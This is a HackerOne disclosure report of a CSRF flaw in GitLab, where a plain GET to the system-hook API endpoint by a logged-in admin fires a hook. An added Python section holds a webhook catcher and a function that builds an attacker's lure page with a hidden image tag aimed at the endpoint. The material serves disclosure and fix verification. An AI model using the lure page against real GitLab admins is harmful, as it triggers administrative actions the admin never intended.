CSRF in System hooks execution through API
HackerOne report #471274 by mishre
on 2018-12-22:
Summary: GitLab allows instance-wide admins to configure system hooks, which are executed on certain events across all projects. However, there is an API endpoint that sends a test delivery of a system hook merely by being browsed (a plain GET request) by a logged-in admin.
Description:
When an admin is logged in and an attacker lures them to browse https://gitlab-instance/api/v4/hooks/{hook-id}
the hook is executed with test parameters, possibly causing undesired actions to be performed (requests the admin did not intend to send). Because a GET request is sufficient, the attacker can cause a silent execution of the web hook by luring the admin to a site under the attacker's control that embeds an image tag pointing to the mentioned endpoint, or simply by luring the admin into clicking a link.
Steps To Reproduce:
- Log in to GitLab as the instance admin.
- Browse to https://gitlab-instance/admin/hooks
- Create a hook pointing to a server under your control.
- Now browse to https://gitlab-instance/api/v4/hooks/1 (substitute 1 with the id of the hook you created).
- To verify that this actually executed the hook, check your hook server's logs: you should see a request carrying the X-Gitlab-Event header.
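To make the verification step concrete, here is a small webhook catcher that plays the role of the "server under your control" in the steps above. It is an added example written for this page, not code from the original report or from GitLab: it records every request it receives, flags the ones carrying the X-Gitlab-Event header as real hook deliveries, and also builds the lure page (an image tag pointing at the hook endpoint) that a CSRF attacker would host. The hostnames, port and the sample body sent in the test are assumptions; only the X-Gitlab-Event header and the /api/v4/hooks/{id} path come from the report.

```python
"""Webhook catcher for verifying that a GitLab system hook actually fired.

Added example for this report (not GitLab's code). Run it, create a hook
pointing at http://<your-host>:8000/, then browse /api/v4/hooks/<id> as admin
and watch for a line tagged GITLAB-HOOK.
"""
import html
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def classify_delivery(method, headers):
    """Describe a request, flagging GitLab hook deliveries.

    GitLab marks hook deliveries with an X-Gitlab-Event header (the report
    relies on exactly this header to confirm execution). `headers` may be
    any mapping with a case-insensitive .get(), e.g. self.headers below.
    """
    event = headers.get("X-Gitlab-Event")
    return {
        "method": method,
        "is_gitlab_hook": event is not None,
        "event": event,
        "user_agent": headers.get("User-Agent", ""),
    }


def lure_page(instance_url, hook_id):
    """HTML an attacker would host: a GET to the endpoint is all it takes.

    The admin's browser attaches the GitLab session cookie automatically,
    so loading this "image" fires the hook with test parameters.
    """
    target = f"{instance_url.rstrip('/')}/api/v4/hooks/{int(hook_id)}"
    return (
        "<html><body><p>nothing to see here</p>"
        f'<img src="{html.escape(target, quote=True)}" width="1" height="1">'
        "</body></html>"
    )


class CatcherHandler(BaseHTTPRequestHandler):
    def _record(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""
        entry = classify_delivery(self.command, self.headers)
        entry["path"] = self.path
        entry["body"] = body.decode("utf-8", "replace")
        self.server.deliveries.append(entry)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok\n")

    do_GET = _record
    do_POST = _record

    def log_message(self, fmt, *args):
        # One line per request; hook deliveries are tagged so they stand out.
        last = self.server.deliveries[-1] if self.server.deliveries else None
        tag = "GITLAB-HOOK" if last and last["is_gitlab_hook"] else "other"
        event = last["event"] if last else None
        print(f"[{tag}] {self.command} {self.path} event={event}")


class CatcherServer(HTTPServer):
    def __init__(self, addr):
        super().__init__(addr, CatcherHandler)
        self.deliveries = []  # one dict per received request, in order


def start_catcher(host="127.0.0.1", port=0):
    """Start the catcher in a background thread; returns (server, bound_port)."""
    server = CatcherServer((host, port))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def gitlab_deliveries(server):
    """Only the requests that GitLab itself sent (header present)."""
    return [d for d in server.deliveries if d["is_gitlab_hook"]]


if __name__ == "__main__":
    srv = CatcherServer(("0.0.0.0", 8000))  # assumed port
    print("listening on :8000; point a system hook here, then browse /api/v4/hooks/<id>")
    try:
        srv.serve_forever()
    except KeyboardInterrupt:
        pass
```

Seeing a GITLAB-HOOK line after merely loading the URL (or the lure page) in an admin's browser is the whole finding: no form, no token, no POST was required. The same catcher serves to confirm a fix, since after the endpoint is changed to POST a plain navigation or image load must no longer produce a delivery.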
Impact
An attacker can cause system hooks to be executed without the admin intending it, i.e. a CSRF against an administrative API endpoint.
Security Team Recommendation
Change the HTTP method to POST to be consistent with the solution in https://gitlab.com/gitlab-org/gitlab-ce/issues/42604.